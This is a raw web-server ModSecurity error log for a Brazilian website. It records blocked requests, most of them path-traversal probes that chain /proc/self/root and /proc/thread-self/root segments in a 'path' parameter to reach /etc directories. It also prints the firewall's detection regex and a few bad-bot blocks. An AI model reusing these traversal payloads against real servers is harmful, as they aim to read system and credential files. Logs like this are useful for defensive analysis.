[Wed Mar 18 06:29:26.760594 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:37806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwdtY0UrI5A3LftIxrHAAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:29:33.310050 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:37800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwfUzinOy1jxa1j4fmLQAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:29:41.741921 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:49370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwhSmAPhZkrhU8w4lBbAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:30:00.408295 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:44818] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwmAkwaGbbGflqUZDkDAAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:30:09.803361 2026] [:error] [pid 11816:tid 140411565680384] [client 204.12.208.18:56039] [client 204.12.208.18] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/wp-content/pl2ea67b/edit.php"] [unique_id "abpwoew_le52K8_3pV20KwAAAhU"], referer: https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php
[Wed Mar 18 06:30:47.570935 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:56322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwx9a6ubjKNq_cu4Zp7AAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:30:48.938634 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:47710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwyOw_le52K8_3pV20MQAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:31:05.351862 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:47716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpw2eoXxyEfFpUF8f9AegAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:31:06.641392 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:52970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpw2uyqAr6etmhZHNqPSAAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:31:07.875439 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:54238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpw2_u8EFLIOrSqIpvZYwAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:31:21.504372 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:54242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpw6eyqAr6etmhZHNqPVQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:31:31.210182 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:33110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpw8-w_le52K8_3pV20SQAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:31:32.492616 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:34336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpw9OyqAr6etmhZHNqPWQAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:31:41.631900 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:34352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpw_cdf6f5d65gmYZSmYwAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:32:23.272268 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:38624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpxJ-w_le52K8_3pV20dgAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:32:31.107548 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:44044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpxL-w_le52K8_3pV20iAAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:32:34.480382 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.228.61:38764] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpxMsdf6f5d65gmYZSmbAAAAtY"]
[Wed Mar 18 06:32:36.326886 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.244.43:40634] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpxNPu8EFLIOrSqIpvZfgAAAko"]
[Wed Mar 18 06:33:35.251423 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:42578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpxbeoXxyEfFpUF8f9A0AAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:33:40.971272 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:34606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpxdMdf6f5d65gmYZSmfgAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:33:43.671269 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:46970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpxd9Y0UrI5A3LftIxsBgAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:33:54.002945 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:46972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpxgvu8EFLIOrSqIpvZmQAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:34:07.801177 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:56098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpxj9a6ubjKNq_cu4ZqUAAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:34:25.177634 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:55166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpxodY0UrI5A3LftIxsJQAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
